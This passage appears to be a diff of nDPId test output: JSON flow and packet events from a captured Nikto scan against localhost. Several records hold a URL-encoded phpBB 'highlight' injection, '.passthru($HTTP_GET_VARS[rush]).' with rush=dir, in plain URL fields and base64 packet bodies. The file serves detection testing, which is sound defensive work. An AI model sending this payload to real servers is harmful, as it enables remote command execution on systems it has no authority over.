(Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277767,"pkt":"AAAAAAAAAAAAAAAACABFAAFrfdxAAEAGva5\/AAABfwAAAcbKH5Cyd0T8zDk2q4AYAED\/XwAAAQEICp1m\/y+dZv8vR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277767,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277769,"pkt":"AAAAAAAAAAAAAAAACABFAAFl4jZAAEAGWVp\/AAABfwAAAcbMH5Dub9sXJ7s4LIAYAED\/WQAAAQEICp1m\/zGdZv8wR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KDQo="} -01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277769,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277770,"pkt":"AAAAAAAAAAAAAAAACABFAAFjvxlAAEAGfHl\/AAABfwAAAcbOH5BOc4Y2FZ1LBYAYAED\/VwAAAQEICp1m\/zKdZv8yR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277772,"pkt":"AAAAAAAAAAAAAAAACABFAAFjEuZAAEAGKK1\/AAABfwAAAcbQH5A1ISvIAGoQJ4AYAED\/VwAAAQEICp1m\/zSdZv8zR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277773,"pkt":"AAAAAAAAAAAAAAAACABFAAFe9U5AAEAGRkl\/AAABfwAAAcbSH5CRq8xwNBHz4IAYAED\/UgAAAQEICp1m\/zWdZv81R0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277776,"pkt":"AAAAAAAAAAAAAAAACABFAAFnAwdAAEAGOIh\/AAABfwAAAcbUH5DtkDois29dAoAYAED\/WwAAAQEICp1m\/zidZv83R0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277777,"pkt":"AAAAAAAAAAAAAAAACABFAAFsiexAAEAGsZ1\/AAABfwAAAcbWH5BYorDPfm\/b94AYAED\/YAAAAQEICp1m\/zmdZv85R0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vb